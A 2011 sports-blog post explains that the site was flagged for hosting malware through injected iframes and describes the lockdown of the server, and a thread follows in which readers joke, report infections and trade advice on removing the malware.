Malware Update
Yesterday people started telling me the site had been flagged by Google for hosting malware, and we found it. It appears to be a database thing not actually related to Drupal since another site on the server running Wordpress got hit at the same time, and it only places the bad code in the files intermittently—so when it was gone yesterday I thought it was gone for good. If you actually get infected it will be very obvious. Instructions on how to remove "System Tool" are all over the google, but usually the best course of action is to do a system restore.
We've locked the server down so that nothing should be able to write to the files that were problematic; unfortunately this has the secondary effect of disaggregating all the javascript and css files. That will make initial loads kind of painful, but it should also get us out of the woods until we can find a better solution.
I'm going to be monitoring this closely the rest of the day, but my body has its own malware—zing!—and I feel miserable so other than watching for iframes like a hawk I am taking a sick day.
A thousand apologies for any trouble this caused people.
January 25th, 2011 at 1:40 PM ^
Does this mean no UV today?
January 25th, 2011 at 6:33 PM ^
Time for Beveled Guilt, people!
January 25th, 2011 at 1:42 PM ^
With great power comes great responsibility. I can't even imagine the insane number of emails you got in the last 24 hours. Thanks again for the hard work.
January 25th, 2011 at 1:45 PM ^
I bet it leads to somewhere in Allegheny County. TGibson I presume???? Hath he no shame! Leave us be demon!
January 25th, 2011 at 1:51 PM ^
Meaning no more Miss Pac-Man on the Commodore64?
January 25th, 2011 at 2:02 PM ^
of hours of classic games. In fact, I think we had the red and black joystick shown in that photo.
January 25th, 2011 at 2:13 PM ^
He took the picture in your house.
January 25th, 2011 at 2:44 PM ^
January 25th, 2011 at 2:50 PM ^
strange noises I heard in my house 20 years ago!
January 25th, 2011 at 1:59 PM ^
and this Blog needed an enema.
January 25th, 2011 at 3:58 PM ^
With friends like us, who needs enemas?
January 25th, 2011 at 1:59 PM ^
January 25th, 2011 at 2:01 PM ^
You can request a review of the site using google's webmaster tools, if you haven't already. It expidites the process of getting the warning removed.
January 25th, 2011 at 2:13 PM ^
Somehow this is Greg Robinson's fault
January 25th, 2011 at 2:16 PM ^
January 25th, 2011 at 2:33 PM ^
I got this malware from another site a month or so ago and did a system restore, it removed the malware but i started getting a ton of svchost errors and then internet commercials from wtka and 97.1 online started playing at all hours of the day/night. Had to leave the thing on mute. It got so bad with svchost errors the pc wouldnt stay up for more than 3 minutes, even in safe mode.
I had to rip the HD out and get a sata cable to pull the data off and load a new copy of the OS.
January 25th, 2011 at 3:00 PM ^
The only way this happened is if you didn't completely wipe your hard drive. Viruses don't just lurk around in your keyboard waiting to reinfect your system. If you wiped the drive, the viruses are gone.
January 25th, 2011 at 3:31 PM ^
Not sure what you are talking about, all I said was after the malware attack I did a system restore and my computers functionality deteriorated over a few weeks. It wouldnt stay up for more than a few minutes. It got so bad I had to reload the OS. Maybe you misunderstood my post.
January 25th, 2011 at 2:33 PM ^
feel better soon.
January 25th, 2011 at 2:36 PM ^
we'll tweet ya if the site blows up
January 25th, 2011 at 2:36 PM ^
I've been wandering in the desert of ESPN and (dare I say it) Mlive, just attempting to eek out a little bit of pertinent information. Thanks for your diligence Brian, and get better.
January 25th, 2011 at 4:31 PM ^
I still get the attack page screen when I come here on firefox, so I had to disable that on my options. But now it pops up saying it can't run some protocol the blog runs called I think htc, or htp, something like that. Weird.
January 25th, 2011 at 6:06 PM ^
January 25th, 2011 at 4:32 PM ^
Is it just coincidence that the main site identified as the culprit by Google starts with osu (osufoyysdf.co.cc)? Or is something more sinister going on? Has cyberwar been declared on us?
January 25th, 2011 at 4:59 PM ^
January 25th, 2011 at 5:10 PM ^
Would the malware affect macs at all? I know I got on mgoblue on my friends mac at the time of the outbreak and was wondering if I need to inform him of anything...
January 25th, 2011 at 6:23 PM ^
This particular malware can't install on a Mac.
January 25th, 2011 at 7:50 PM ^
Ha yes...mgoblog. My bad
January 25th, 2011 at 5:54 PM ^
j/k. Thanks Brain for the diligence. Malware can be a b**ch to prvent against with ads, so I commend you.
January 25th, 2011 at 6:14 PM ^
January 25th, 2011 at 7:24 PM ^
I just got a virus on my computer, is it from this? (I have no idea since I know nothing about computers.)
January 25th, 2011 at 7:56 PM ^
Not hit by the main page, but while attempting to open the MGoBoard links in new windows. Got the following warning:
This page may be a forgery or imitation of another website, designed to trick users into sharing personal or financial information. Entering any personal information on this page may result in identity theft or other abuse. You can find out more about phishing here.
I assumed that it was an "old warning," so I told AVG to let me through, then got hit. I just tried again, 755pm (after cleaning off my computer), and still got the same message.
January 26th, 2011 at 2:53 PM ^
If you managed to snag anything from the site, Malwarebytes should remove it. Download it from malwarebytes.org, update, and run a quick scan. You should be good after that.
Comments